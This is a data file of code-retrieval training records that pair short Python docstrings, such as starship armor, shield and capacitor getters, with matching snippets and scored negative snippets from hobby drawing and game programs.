pen.left(90)\r\n pen.down()\r\n pen.forward(40)\r\n pen.right(90)\r\n pen.up()\r\n pen.forward(20)\r\n pen.down()\r\n pen.back(40)\r\n pen.up()\r\n pen.right(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(50)", "def drawJumper(self):\n for x in self.jumper:\n print(x)", "def draw(self, screen):\r\n if self.selected:\r\n used_color = (255 - self.color[0], 255 - self.color[1], 255 - self.color[2])\r\n else:\r\n used_color = self.color\r\n pygame.draw.rect(screen, used_color,\r\n (self.location_top_left[0], self.location_top_left[1], self.size_x, self.size_y), 0)", "def draw(self, x, y):\r\n for w in self.widgets:\r\n if w.visible:\r\n w.draw()\r\n self.pointer.position(x + self.p_dx, y + self.p_dy, 0.5)\r\n self.pointer.draw()", "def up(self):\r\n self.brush_on = False", "def draw_target():\n\n t = turtle\n t.up()\n t.goto(-target[SIZE], -target[SIZE])\n t.setheading(0)\n t.pensize(2)\n t.down()\n for side in range(4):\n t.fd(target[SIZE] * 2)\n t.left(90)", "def draw(self,ctx):\n step = self.greatest / 5\n # Drawing the scale\n ctx.set_source_color(self.get_style().fg[gtk.STATE_NORMAL])\n for i in range(int(step), int(self.greatest),5):\n x_bearing, y_bearing, txt_width, txt_height = ctx.text_extents(str(i))[:4]\n ctx.move_to(-10.5 - txt_width / 2 - x_bearing, self.available_height - (self.available_height - 20) * i / self.greatest - txt_height / 2 - y_bearing )\n\n ctx.show_text(str(i))", "def draw_o(self):\r\n pen.down()\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.up()\r\n pen.forward(50)", "def draw(self):\n if not self.pressed:\n #draw info prompt in room\n arcade.draw_rectangle_filled(self.center_x, self.center_y, 20, 20, arcade.color.ANTIQUE_BRASS)\n arcade.draw_text(\"?\", self.center_x, self.center_y, arcade.color.BLACK, anchor_x=\"center\", anchor_y=\"center\")\n else:\n #draw info to top of screen when clicked\n arcade.draw_text(self.text, 10, settings.HEIGHT - 10, arcade.color.BLACK, anchor_x=\"left\", anchor_y=\"top\")", "def down(self):\r\n self.brush_on = True", "def ToggleDrawingTools(self, event):\n pass", "def on_click(self, e: ti.template()):\n for i, j in ti.ndrange(self.nx, self.ny):\n if self.inside(self.Vector2(i / self.nx, j / self.ny),\n self.Vector2(e.pos[0], e.pos[1]), 0.03):\n self.T[i, j] = 1", "def interaction_door(self) -> None:\n self.grid.win = True", "def _right_click(self, event):\n\n position = event.x, event.y\n cell_position = self._game.grid.pixel_to_cell(position)\n\n removed_tower = self._game.remove(cell_position)\n self._coins += removed_tower.get_value() * 0.8\n\n #updates coins string var to display coins\n self._status_bar.set_coins(self._coins)\n\n #update availability for tower views\n for tower, view in self._tower_views:\n if self._coins < tower.get_value():\n view.set_available(False)\n else: \n view.set_available(True)", "def grab(self, event):\n self.ypos = event.y\n self.xpos = event.x\n self.config(cursor='fleur')", "def Point_Pick(self):\n self.vtkWidget.iren.AddObserver('RightButtonPressEvent', self.pick_loc)\n self.renWin.Render()", "def draw(self, screen):" ]
[ "0.6205973", "0.61523294", "0.6008315", "0.5989245", "0.5944279", "0.5893319", "0.5844363", "0.5831077", "0.5826656", "0.58184046", "0.58160055", "0.5798459", "0.5755259", "0.57308894", "0.5701369", "0.5675944", "0.5657623", "0.56501853", "0.56467706", "0.5638101", "0.56190854", "0.56162554", "0.56036353", "0.56012714", "0.55674446", "0.555112", "0.5537631", "0.5533743", "0.5526541", "0.55262685" ]
0.7217638
0
Returns the scan resolution in mm of the ship.
def scanResolution(self): return self._getAttribute(Attribute.scanResolution)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getResolution(self):\n return self.resolution", "def getResolution(self):\n return self._lowLevelGetDeviceResolution()", "def get_current_resolution(self):\n return self.display_info[\"width\"], self.display_info[\"height\"]", "def resolution(self) -> int:\n return self._resolution", "def Resolution(self):\n\t\treturn self._get_attribute('resolution')", "def get_resolution(self):\n return self.__resolution", "def resolution(self) -> int:\n return self.options.resolution", "def resolution(self):\n return self._resolution", "def resolution(self):\n return Prism.resolution(self,self.beam,self.wavelength)", "def resolution_mm_xy(self):\n return self.resolution_pixels_xy * self.pixels_to_mm_scale_factors_xy", "def resolution(self):\n assert self.has_video\n\n return self.__resolution", "def _resolution(self):\n _, xres, _, _, _, yres = self.geotransform\n return xres, yres", "def resolution(self):\n return {'x': self.width, 'y': self.height}", "def get_device_resolution(self):\n\t\tinstance = Device()\n\t\twidth, height = instance.get_screen_resolution() \n\t\treturn list((width, height))", "def effective_resolution(self) -> Tuple[int, int]:\n import numpy as np\n\n assert self.info.resolution, 'No base resolution specified'\n rot = (self.info.rotate or 0) * math.pi / 180\n sin = math.sin(rot)\n cos = math.cos(rot)\n scale = np.array([[self.info.scale_x or 1.0, self.info.scale_y or 1.0]])\n resolution = np.array([[self.info.resolution[0], self.info.resolution[1]]])\n rot_matrix = np.array([[sin, cos], [cos, sin]])\n resolution = (scale * abs(np.cross(rot_matrix, resolution)))[0]\n return int(round(resolution[0])), int(round(resolution[1]))", "def width(self):\n return self.config.get('resolution', {}).get('x',1920) #1280", "def size(self) -> (float, float):\n\n return self.screen.get_surface().get_size()", "def pixelsize(self):\n if hasattr(self, \"_pixelsize\"):\n return self._pixelsize\n\n try:\n return self.header[\"PixSize\"] # [arcsec]\n except KeyError:\n try:\n return abs(self.header[\"CDELT1\"]) * 3600 # [deg] -> [arcsec]\n except KeyError:\n return None", "def getSweepResolution(self) -> int:\n\n if not self.debug:\n self.myFieldFox.write(\"SWE:POIN?\")\n ret = int(self.myFieldFox.read())\n else:\n ret = 401\n return ret", "def get_pixel_size(self):\n p0 = core.PointF(0, 0)\n p1 = core.PointF(1, 1)\n tr = self.transform().inverted()[0]\n p01 = tr.map(p0)\n p11 = tr.map(p1)\n return core.PointF(p11 - p01)", "def get_screen_resolution() -> (int, int):\n h_desktop = user32.GetDesktopWindow()\n\n # Get screen resoltion virtualized for DPI\n rect = RECT()\n success = user32.GetWindowRect(h_desktop, pointer(rect))\n if not success:\n raise OSError(GetLastError())\n\n # Get rescale factor for primary monitor\n hmonitor = user32.MonitorFromWindow(\n h_desktop, MONITOR_DEFAULTTOPRIMARY)\n rescale_factor = c_long(0)\n result = shcore.GetScaleFactorForMonitor(\n hmonitor, pointer(rescale_factor))\n if result != S_OK:\n logging.error(\"GetScaleFactorForMonitor failed.\")\n raise OSError(GetLastError())\n\n # Calcuate the resolution before scaling.\n rescale_factor = rescale_factor.value\n res_x = int((rect.right - rect.left) * rescale_factor / 100)\n res_y = int((rect.bottom - rect.top) * rescale_factor / 100)\n return res_x, res_y", "def resolution_range(self) -> Optional[float]:\n return self._get_property(RESOLUTION_RANGE_PROP, float)", "def get_precision(self):\n config_str = self.raw_sensor_strings[1].split()[4] # Byte 5 is the config register\n bit_base = int(config_str, 16) >> 5 # Bit 5-6 contains the resolution, cut off the rest\n return bit_base + 9 # min. is 9 bits", "def getSize(self):\n return self.screen.get_size()", "def get_resolution(self):\n ret_val = False\n width = 0\n height = 0\n try:\n sink = self.player.get_by_name('sink')\n sample = GstBase.BaseSink.get_last_sample(sink)\n caps = Gst.Sample.get_caps(sample)\n struct = Gst.Caps.get_structure(caps, 0)\n h_result, height = Gst.Structure.get_int(struct, \"height\")\n w_result, width = Gst.Structure.get_int(struct, \"width\")\n if h_result and w_result:\n ret_val = True\n except:\n ret_val = False\n\n return ret_val, width, height", "def pix_size(self):\n return self._pix_size", "def _get_scaling(root):\n dpi = root.winfo_fpixels(\"1i\")\n scaling = dpi / 72.0\n logger.debug(\"dpi: %s, scaling: %s'\", dpi, scaling)\n return scaling", "def getResolution(s) -> int:\n unit = getDurationUnit(s)\n #number of ticks is 1 / unit (if that is an integer)\n ticksPerQuarter = unit.denominator / unit.numerator\n if ticksPerQuarter.is_integer():\n return int(unit.denominator / unit.numerator)\n else:\n print(s.filePath, ' non integer number of ticks per Quarter')\n return 0", "def get_screen_size(self):\n return self.__screen_size", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz" ]
[ "0.7246049", "0.69126594", "0.685117", "0.6794998", "0.67246604", "0.6541934", "0.6535295", "0.6369", "0.6277552", "0.6272509", "0.6237596", "0.62197703", "0.61901945", "0.6151652", "0.61414826", "0.61146194", "0.6110332", "0.6093271", "0.6090543", "0.6054958", "0.60548455", "0.6043546", "0.601135", "0.6004819", "0.6001022", "0.59914637", "0.5979775", "0.5977079", "0.59722686", "0.5932197" ]
0.73278564
0
Returns the max number of locked targets.
def maxTargets(self): return self._getAttribute(Attribute.maxTargets)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def maxTasksAchievable(self):\n maxTasks = 0\n for w in self._workers:\n maxTasks = maxTasks + w.multitask\n return maxTasks", "def max_node_count(self) -> int:\n return pulumi.get(self, \"max_node_count\")", "def node_count_max(self) -> int:\n return int(self.graph_tuple_stats.node_count_max or 0)", "def getMaxNumPins(self):\n return max(b.getNumPins() for b in self.getBlocks())", "def max_num_links(self):\n return self._max_num_links", "def maximum_number_of_workers(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"maximum_number_of_workers\")", "def numprocesses(self):\n info = self.info()\n return info['max_processes']", "def max_creds(self) -> int:\n return self._max_creds", "def max_node_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_node_count\")", "def max_count(self):\n return self.config.get('max_count', 500)", "def testMaxTargets(self):\n\n self.assertEqual('Maxtargets: %s' % inventory_base.DEFAULT_MAXTARGETS,\n self.inv._CmdMaxTargets('maxtargets', []))\n self.inv._CmdMaxTargets('maxtargets', ['10'])\n self.assertEqual(10, self.inv._maxtargets)", "def max_waiting(self):\n return self._max_waiting", "def control_edge_count_max(self) -> int:\n return int(self.graph_tuple_stats.control_edge_count_max or 0)", "def get_max_cleverbot_requests(self):\n return int(self.bot_data_file[\"maxCleverbotRequests\"])", "def max_nodes(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"max_nodes\")", "def get_number_executors(self):\n with self.__threads_lock:\n return self.__number_executors", "def maximum_number_of_workers(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"maximum_number_of_workers\")", "def jobserver_max_jobs():\n\n if _MakeJobServer._singleton is not None:\n return _MakeJobServer._singleton.num_jobs\n else:\n return 0", "def num_tasks(self) -> int:\n return len(self.targets)", "def concurrent_tasks_limit(self):\n return self._concurrent_tasks_limit", "def max_pending(self):\n return self._max_pending", "def max_num_neighbors(self):\n return self._max_num_neighbors", "def total_max_node_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"total_max_node_count\")", "def max_individuals(self) -> int:\n return self.group_size.upper * self.groups_allowed", "def max_trials(self) -> int:\n return self._max_trials", "def max_known_number(self):\n return len(self.number_list)-1", "def getMaxMancount(self):\n return self.__size * 20", "def getNrTargets(self):\n return self.targetNames.size", "def maxTimes(self)->int:\n return self._lic.params['maxAccessTimes'].value", "def max_parallel_launches(self) -> Optional[int]:\n return pulumi.get(self, \"max_parallel_launches\")" ]
[ "0.7053719", "0.6945075", "0.67787427", "0.6716458", "0.66914487", "0.65706974", "0.6546918", "0.6542584", "0.65309083", "0.65046275", "0.6473251", "0.6438238", "0.6386052", "0.6385337", "0.6385203", "0.63613576", "0.6358105", "0.63530767", "0.63487595", "0.6279512", "0.6271077", "0.62642294", "0.6264195", "0.62610316", "0.6255949", "0.62487525", "0.6232971", "0.6205189", "0.6177911", "0.61687356" ]
0.6987084
1
Returns the sensor strength of the ship.
def sensorStrength(self): # TODO: also return type of sensor radar = self._getAttribute(Attribute.scanRadarStrength) ladar = self._getAttribute(Attribute.scanLadarStrength) magnetometric = self._getAttribute(Attribute.scanMagnetometricStrength) gravimetric = self._getAttribute(Attribute.scanGravimetricStrength) return radar or ladar or magnetometric or gravimetric
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getStrength(self):\n return self.st", "def strength(self) -> int:\n return self._strength", "def wireless_signal_strength(self) -> int:\n return self.data[Attribute.WIRELESS_SIGNAL_STRENGTH]", "def getPersonStrength(self):\n strength = self.myDesign.myShipHull.mass/200\n return strength", "def get_strength(self):\n return 10 - self.get_agility()", "def strength(self) -> float:\n ...", "def get_wind_sensor(self) -> int:\n self.serial.write(b\"V!\")\n wind_sensor = self.__extract_int(self.__read_response(1)[0], b\"!w\")\n\n return wind_sensor", "def get_winStrength(self):\n if self.winStrength is None:\n self.calculate_my_win_strength()\n return self.winStrength", "def strength(self):\n return self._characterStrength", "def weapon_strength(weapon):\n weapon_strength_int = WEAPON_STRENGTHS[weapon]\n #print weapon_strength_int\n return weapon_strength_int", "def wind_speed(self):\r\n return self._yesterdays_weather.get_average_wind_speed()", "def get_water_level(self):\n return self.water_level", "def getOutputStrength(self):\n return DPxGetDinDataOutStrength()", "def ship_rate(self):\n\t\treturn self.industry * (self.manufacturing.level + 5) / 24.0", "def GetCurrentSignalStrength(self, iwconfig=None):\n try:\n strength = int(self.wifi.GetSignalStrength(iwconfig))\n except:\n strength = 0\n return strength", "def getLightSensor() -> int:\n pass", "def get_windtspeed(self):\n return self.read_register(4111, 0, 3)", "def windspeed(self):\r\n try:\r\n return str(self.connect()['wind']['speed'])\r\n except:\r\n return '@weather_windspeed'", "def native_wind_speed(self) -> float:\r\n return self._first_timeserie[\"data\"][\"instant\"][\"details\"][\"wind_speed\"]", "def tower_damage(self):\n return self._tower_damage", "def get_distance(self, sensor):\n if sensor not in self.distance_sensors:\n raise ValueError('sensor should be one of {}!'.format(self.distance_sensors))\n\n return 255 - self._io.last_state['distance'][sensor]", "def get_resistance(self):\n adc = ADC(self.pin)\n value = adc.read()\n if value == 0:\n return -1\n\n return (4095./value - 1.) * self.RLOAD # ESP32 maksimi, ESP8266:lle arvo on 1023", "def getWatts(self):\n return self.json_state.get(\"charging\").get(\"watt_power\")", "def wind_speed(self):\n return self.flow_field.wind_speed", "def get_speed(self):\n return self.get_par(\"slew_speed\")", "def get_health(self):\n return round(self.health)", "def get_total_energy_produced (self):\n return self.net_generation_wind", "def state(self):\n value = getattr(self.coordinator.senec, self._sensor)\n try:\n rounded_value = round(float(value), 2)\n return rounded_value\n except ValueError:\n return value", "def wind_speed(self):\n names = ['anc_mean_wind_speed']\n return self.sensor.get_with_fallback('wind_speed', names)", "def native_wind_gust_speed(self) -> float | None:\n return self._wind_gust_speed" ]
[ "0.72526914", "0.67626673", "0.6689082", "0.6676303", "0.6576709", "0.6460022", "0.6326511", "0.6292669", "0.62278104", "0.6079792", "0.60773563", "0.602665", "0.6026219", "0.5985158", "0.5903484", "0.5875291", "0.58557934", "0.582385", "0.5819542", "0.58171266", "0.58148235", "0.5793279", "0.57787484", "0.57715786", "0.57208943", "0.57092875", "0.5704306", "0.569264", "0.5689249", "0.5662216" ]
0.79078126
0
Returns details about the ship's capacitor.
def capacitor(self): capacity = self._getAttribute(Attribute.capacitorCapacity) recharge = self._getAttribute(Attribute.capacitorRecharge) recharge /= 1000 # milliseconds return { "capacity": capacity, "recharge": recharge, }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getShip(self):\r\n return self._ship", "def my_ship_info(self, ship_id):\n r = requests.get(self.base_url + f'/users/{self.username}/ships/{ship_id}', headers=self.auth_header)\n return r.text", "def get_card(self):\n return self.card", "def card(self):\n return self.cdb.name_to_card[self.card_name]", "def capacidad(self) -> int:\n return self._capacidad", "def show_board(self):\n print(self.capacity_list)", "def _player_info(self):\n return \"%r %s seat:%s m:%r c:%s b:%s \" % (self.name, self.serial, self.seat, self.money, self._chips, self._bet)", "def info(self, req):\n items = api.get_zone_capabilities(req.environ['nova.context'])\n\n zone = dict(name=FLAGS.zone_name)\n caps = FLAGS.zone_capabilities\n for cap in caps:\n key, value = cap.split('=')\n zone[key] = value\n for item, (min_value, max_value) in items.iteritems():\n zone[item] = \"%s,%s\" % (min_value, max_value)\n return dict(zone=zone)", "def get_coulomb_info(self):\n return", "def get_pbc_info(self):\n return", "def __repr__(self):\n return f\"Card({self.face}, {self.value}, {self.suit})\"", "def meta(self) -> CardMeta:\n return self._stat", "def billing_info(self):\n return self._billing_info", "def capacitance(self):\n return None", "def cap(self):\n return self._cap", "def get_display_info(self):\n return self.display_info", "def getMyShipInfo(self):\n d = self.getMyInfoAsDict()\n d['quads'] = self.getMyDictInfo('quads', 'getMyQuadInfo')\n d['targets'] = self.targets\n d['availSystems'] = self.availSystems\n d['oldAvailSystems'] = self.oldAvailSystems\n return d", "def get(self):\n user = get_authenticated_user()\n return get_card(user)", "def get_card (self, card):\n\t\treturn self._card", "def __repr__(self):\n name = \"Investor: %s\" % self.name\n cash = \"Cash: %s\" % self.cash\n risk_money = \"Risk Money: %s\" % self.risk_money\n portfolio = \"Portfolio: %s\" % self.portfolio\n info = name + cash + risk_money + portfolio\n return info", "def get_capacitor(self):\n cap = 0.5 * self.metric_.logdet()\n return cap", "def get_cp_info(self):\n return self.get(COMMAND_CPM, 'GetCpInfo')", "def get_info(self, charger):\n data = {\n \"device_id\": self.uuid,\n \"cmd\": \"get_info\",\n \"token\": charger.token(),\n \"account_token\": self.api_token\n }\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n response = requests.post(\"{}/box_api_secure\".format(self.BASE_URL),\n data=json.dumps(data),\n headers=headers)\n response_json = response.json()\n return response_json", "def get_info(self):\n self.exists = self.check_subscr()\n return self.attrs", "def draw_active_player_stats(self, screen):\n p = self.game.turn_manager.get_vision_character()\n\n for index, (k, v) in enumerate(p.characteristics.items()):\n self.game.draw_text(k + \": \" + str(v),\n self.game.title_font, 40, YELLOW_LIGHT, 7*WIDTH // 12, (6 + index)*HEIGHT // 20,\n screen=screen)\n\n self.game.draw_text(\"HP : \" + str(p.health) + \"/\" + str(p.max_HP),\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 8*HEIGHT // 20,\n screen=screen)\n self.game.draw_text(\"Mana : \" + str(p.MP) + \"/\" + str(p.max_MP),\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 9*HEIGHT // 20,\n screen=screen)\n self.game.draw_text(\"Xp : \" + str(p.xp) + \"/ 100\",\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 10*HEIGHT // 20,\n screen=screen)\n self.game.draw_text(\"Gold : \" + str(p.gold),\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 11*HEIGHT // 20,\n screen=screen)\n screen.blit(p.image, (WIDTH // 3, 5*HEIGHT // 20))", "def get_vacuum_gripper(self):\r\n return self._arm.get_suction_cup()", "def billing_info(self):\r\n return BillingInfo(self)", "def obter_caminho(self):\n return self.caminho", "def __str__(self):\n if self.rank == 1 and self.suit == 0:\n return \"Back of card\"\n else:\n return ((Card.ranks[self.rank]) + ' of ' + (Card.suits[self.suit]))", "def __repr__(self):\n return str.format(\"Cards: {0} Rank: '{1}' Values: {2}\",\n self.__cards,\n Hand.RANKS[self.rank()],\n self.values())" ]
[ "0.6025865", "0.5962599", "0.5775231", "0.5688934", "0.5532411", "0.53715676", "0.53670514", "0.5319011", "0.52973115", "0.52933747", "0.5288867", "0.5282726", "0.5235691", "0.5224877", "0.52141637", "0.52120286", "0.5172074", "0.5133092", "0.51199114", "0.50787777", "0.5068533", "0.5023075", "0.50141275", "0.5001285", "0.499059", "0.4978675", "0.49731326", "0.49597275", "0.4959289", "0.49534786" ]
0.63753223
0
Returns details about the ship's armor. Resists are integers from 0 to 100.
def armor(self): capacity = self._getAttribute(Attribute.armorCapacity) em = self._getAttribute(Attribute.armorEM) explosive = self._getAttribute(Attribute.armorExplosive) kinetic = self._getAttribute(Attribute.armorKinetic) thermal = self._getAttribute(Attribute.armorThermal) em = 1.0 - em explosive = 1.0 - explosive kinetic = 1.0 - kinetic thermal = 1.0 - thermal return { "capacity": capacity, "resists": { "em": em, "explosive": explosive, "kinetic": kinetic, "thermal": thermal } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getArmor(self):\n return self.av", "def armor(self) -> Union[int, float]:\n return self.type_data.proto.armor", "def armor(self) -> Union[int, float]:\n return self.type_data.proto.armor", "def get_armor_equipped(self):\n\t\treturn self.equippedArmor", "def armor_mapping(self, armor: int) -> str:\n if armor == 0:\n return 'leather'\n elif armor == 1:\n return 'chain-shirt'\n elif armor == 2:\n return 'ring-mail'\n elif armor == 3:\n return 'chain-mail'\n elif armor == 4:\n return 'scale-mail'\n elif armor == 5:\n return 'studded-leather'", "def info_equipment_get():\n equipment = _equipment_by_group()\n return equipment, 200", "def calculate_hit(self, armor_list, inventory):\n armor_power = 0\n for armor in armor_list:\n armor_power += inventory[armor]['power']\n max_strength = max(1, (self.level * 5) - armor_power)\n min_strength = 0\n return random.randint(min_strength, max_strength)", "def info_equipment_reactors_get():\n equipment = _equipment_by_group(438) # 438 == Mobile Reactor\n return equipment, 200", "def hk_armor(self):\n self.name = \"Holy Knight's Armor\"\n self.rarity = \"Common\"\n self.pdef_value = 40\n self.mdef_value = 10\n self.increase_crit = 0\n self.desc = \"Armor of the Holy Guard, you feel the light flowing.\"", "def get(self, item_type):\n armor_type_id = 0 if item_type == \"light\" else 1\n where = f\"type={armor_type_id}\"\n return get_as_object(\"armor\", ArmorData, where=where)", "def choose_armor():\n a = input(\"\"\"\n Choose your armor:\n (1) Heavy\n (2) Medium\n (3) Light\n \"\"\")\n\n saving_throws = ['Evasion', 'Hardiness', 'Spirit']\n if int(a) == 1:\n print(\"You chose Heavy!\")\n x = choose_armor_throw(saving_throws)\n # Remove the chosen saving throw from the list\n del saving_throws[saving_throws.index(x)]\n y = choose_armor_throw(saving_throws)\n return {\n 'type': 'heavy',\n 'ac_mod': -6,\n 'sv_throws': [x, y]\n }\n\n if int(a) == 2:\n print(\"You chose Medium!\")\n x = choose_armor_throw(saving_throws)\n return {\n 'type': 'medium',\n 'ac_mod': -4,\n 'sv_throws': [x]\n }\n if int(a) == 3:\n print(\"You chose Light!\")\n return {\n 'type': 'light',\n 'ac_mod': -2,\n 'sv_throws': []\n }", "def get_armor_options(self):\n\t\toptions = []\n\t\tfor arm in self.inventoryDictionary:\n\t\t\tif isinstance(arm, Items.Armor):\n\t\t\t\toptions.append(arm.name)\n\n\t\treturn options", "def equip_armor(self, armor):\n\t\tfor key in self.inventoryDictionary:\n\t\t\tif key.name == armor:\n\t\t\t\tself.equippedArmor = key\n\t\t\t\treturn True\n\t\treturn False", "def get_damage():\n\n return character['Damage']", "def ac(self):\n if self.armor:\n return self.armor.ac\n return 10 + self.dexterity", "def shield(self):\n capacity = self._getAttribute(Attribute.shieldCapacity)\n recharge = self._getAttribute(Attribute.shieldRecharge)\n em = self._getAttribute(Attribute.shieldEM)\n explosive = self._getAttribute(Attribute.shieldExplosive)\n kinetic = self._getAttribute(Attribute.shieldKinetic)\n thermal = self._getAttribute(Attribute.shieldThermal)\n\n recharge /= 1000 # milliseconds\n em = 1.0 - em\n explosive = 1.0 - explosive\n kinetic = 1.0 - kinetic\n thermal = 1.0 - thermal\n\n return {\n \"capacity\": capacity,\n \"recharge\": recharge,\n \"resists\": {\n \"em\": em,\n \"explosive\": explosive,\n \"kinetic\": kinetic,\n \"thermal\": thermal\n }\n }", "def getResistance(state, resType) :\n debufF = reduce(lambda x, y: x + y, getDebuff(state, resType), 0)\n return state['enemy']['resistance'][resType] + debufF", "def get(self, item_type, entry_name):\n armor = ArmorData(name=entry_name)\n if not hasattr(armor, 'level'):\n return {\"Error\": f\"'{entry_name}' not found in {item_type} armor. \"\n f\"Try this: '{NS.armor._path}/{item_type}/search/\"\n f\"{entry_name.replace(' ', '%20')}'\"\n }, 404\n return armor.associative_data()", "def calculate_damage(\n self, amount:int, *, \n scan_dict:Optional[Dict]=None, \n precision:int=1, \n calculate_crew:bool=True, \n calculate_systems:bool=True, \n damage_type:DamageType,\n use_effective_values:bool=True\n ):\n #assume damage is 64, current shields are 80, max shields are 200\n #armor is 75, max armor is 100\n #80 * 2 / 200 = 160 / 200 = 0.8\n #0.8 * 64 = 51.2 = the amount of damage that hits the shields\n #64 - 51.2 = 12.8 = the amount of damage that hits the armor and hull\n #1 - (75 / 100) = 1 - 0.25 = 0.75\n #12.8 * 0.75 = 9.6 = the amount of damage that hits the armor\n #12.8 - 9.6 = 3.2 = the amount of damage that hits the hull\n \n random_varation = damage_type.damage_variation\n \n if random_varation > 0.0:\n amount = round(amount * uniform(1.0 - random_varation, 1.0))\n \n old_scan = scan_dict if scan_dict else self.scan_this_ship(\n precision, scan_for_crew=calculate_crew, \n scan_for_systems=calculate_systems, \n use_effective_values=use_effective_values\n )\n try:\n current_shields:int = old_scan[\"shields\"]\n except KeyError:\n current_shields = 0\n try:\n polarization:int = old_scan[\"polarization\"]\n \n if calculate_systems:\n \n polarization = round(polarization * (\n ajust_system_integrity(\n old_scan[\"sys_polarize\"]\n ) if use_effective_values else old_scan[\"sys_polarize\"]\n ))\n except KeyError:\n polarization = 0\n current_hull:int = old_scan[\"hull\"]\n \n old_status = self.ship_status\n \n is_hulk = current_hull < 0\n \n try:\n is_derlict = old_scan[\"able_crew\"] + old_scan[\"injured_crew\"] <= 0\n except KeyError:\n is_derlict = False\n try:\n shield_effectiveness = ajust_system_integrity(old_scan[\"sys_shield\"]) if use_effective_values else old_scan[\"sys_shield\"]\n except KeyError:\n shield_effectiveness = 1\n \n shields_are_already_down = shield_effectiveness <= 0 or current_shields <= 0 or not old_status.do_shields_work or not self.shield_generator.shields_up\n \n shields_dam = 0\n armorDam = amount\n hull_dam = amount\n \n shield_dam_multi = damage_type.damage_vs_shields_multiplier\n\n armorHullDamMulti = (\n damage_type.damage_vs_no_shield_multiplier \n if shields_are_already_down else damage_type.damage_vs_hull_multiplier\n ) \n try:\n shields_percentage = current_shields / self.ship_class.max_shields\n except ZeroDivisionError:\n shields_percentage = 0\n shields_are_already_down = True\n \n bleedthru_factor = min(shields_percentage + 0.5, 1.0)\n \n if shields_are_already_down:\n \n hull_dam = amount * armorHullDamMulti\n else:\n to_add = 0\n shields_dam = amount * bleedthru_factor * shield_dam_multi\n if shields_dam > current_shields:\n to_add = shields_dam - current_shields\n \n shields_dam = current_shields\n amount *= (1 - bleedthru_factor)\n amount += to_add\n hull_dam = amount * armorHullDamMulti\n \n hull_dam = round(calculate_polarization(hull_dam, polarization))\n \n new_shields = scan_assistant(current_shields - shields_dam, precision) if shields_dam > 0 else current_shields\n new_hull = scan_assistant(current_hull - hull_dam, precision) if hull_dam > 0 else current_hull\n \n hull_damage_as_a_percent = hull_dam / self.ship_class.max_hull\n try:\n new_shields_as_a_percent = new_shields / self.ship_class.max_shields\n except ZeroDivisionError:\n new_shields_as_a_percent = 0\n new_hull_as_a_percent = new_hull / self.ship_class.max_hull\n \n killed_outright = 0\n killed_in_sickbay = 0\n wounded = 0\n \n if calculate_crew and not is_derlict and not is_hulk:\n \n crew_killed = hull_dam > 0 and new_hull_as_a_percent < random() and not self.ship_class.is_automated\n \n if crew_killed:\n able_crew = old_scan[\"able_crew\"]\n injured_crew = old_scan[\"injured_crew\"]\n \n percentage_of_crew_killed = hull_damage_as_a_percent * random()\n \n total_crew = able_crew + injured_crew\n \n wounded_fac = uniform(0.25, 0.75)\n \n _able_crew_percentage = able_crew / total_crew\n \n percentage_of_able_crew_killed = _able_crew_percentage * (percentage_of_crew_killed * (1 - wounded_fac))\n percentage_of_able_crew_wounded = _able_crew_percentage * (percentage_of_crew_killed * (wounded_fac))\n percentage_of_injured_crew_killed = (injured_crew / total_crew) * percentage_of_crew_killed\n \n killed_outright = round(self.life_support.able_crew * percentage_of_able_crew_killed)\n killed_in_sickbay = round(0.5 * self.life_support.able_crew * percentage_of_injured_crew_killed)\n wounded = round(self.life_support.able_crew * percentage_of_able_crew_wounded)\n \n shield_sys_damage = 0\n energy_weapons_sys_damage = 0\n cannon_sys_damage = 0\n impulse_sys_damage = 0\n warp_drive_sys_damage = 0\n sensors_sys_damage = 0\n torpedo_sys_damage = 0\n warp_core_sys_damage = 0\n cloak_sys_damage = 0\n transporter_sys_damage = 0\n polarized_hull_damage = 0\n scanners_damage = 0\n \n if calculate_systems and not is_hulk:\n chance_to_damage_system = damage_type.chance_to_damage_system\n \n systems_damaged = hull_dam > 0 and new_hull_as_a_percent < uniform(\n hull_damage_as_a_percent, 1.25 + hull_damage_as_a_percent)\n \n if systems_damaged:\n system_damage_chance = damage_type.damage_chance_vs_systems_multiplier\n \n def chance_of_system_damage():\n # this is cumbersome. A better way may be random() * chance_to_damage_system > (old_hull_as_a_percent + new_hull_as_a_percent) * 0.5\n return uniform(\n hull_damage_as_a_percent, chance_to_damage_system + hull_damage_as_a_percent\n ) > new_hull_as_a_percent\n \n def random_system_damage():\n return uniform(0.0, system_damage_chance * hull_damage_as_a_percent)\n \n if self.ship_class.max_shields and chance_of_system_damage():\n shield_sys_damage = random_system_damage()\n \n if self.ship_class.max_beam_energy and chance_of_system_damage():\n energy_weapons_sys_damage = random_system_damage()\n \n if self.ship_class.max_cannon_energy and chance_of_system_damage():\n cannon_sys_damage = random_system_damage()\n \n if self.ship_class.evasion and chance_of_system_damage():\n impulse_sys_damage = random_system_damage()\n \n if self.ship_class.max_warp and chance_of_system_damage():\n warp_drive_sys_damage = random_system_damage()\n \n if 